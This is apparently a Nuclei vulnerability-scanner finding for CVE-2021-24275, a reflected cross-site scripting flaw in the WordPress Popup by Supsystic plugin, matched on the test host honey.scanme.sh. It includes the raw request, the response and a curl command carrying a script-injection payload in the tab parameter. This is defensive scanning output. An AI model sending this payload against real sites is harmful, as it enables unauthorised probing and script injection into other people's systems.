Popup by Supsystic <1.10.5 - Cross-Site scripting (CVE-2021-24275) found on honey.scanme.sh

[mkrs2404]

Details: CVE-2021-24275 matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:03 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/6496c77d697a8425e78f74500412bd92

Template Information

Key	Value
Name	Popup by Supsystic <1.10.5 - Cross-Site scripting
Authors	dhiyaneshdk
Tags	cve2021, cve, wpscan, packetstorm, wordpress, wp-plugin, supsystic
Severity	medium
Description	WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.
Remediation	Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.
CVSS-Metrics	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-ID	CWE-79
CVE-ID	CVE-2021-24275
CVSS-Score	6.10
vendor	supsystic
product	popup
framework	wordpress

Request

GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 307
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:03 GMT

GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6

References:

• https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f
• http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html
• https://nvd.nist.gov/vuln/detail/CVE-2021-24275
• https://github.com/ARPSyndicate/cvemon
• https://github.com/ARPSyndicate/kenzer-templates

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ar; rv:1.9.2) Gecko/20100115 Firefox/3.6' 'https://honey.scanme.sh/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

---

Generated by Nuclei v3.2.5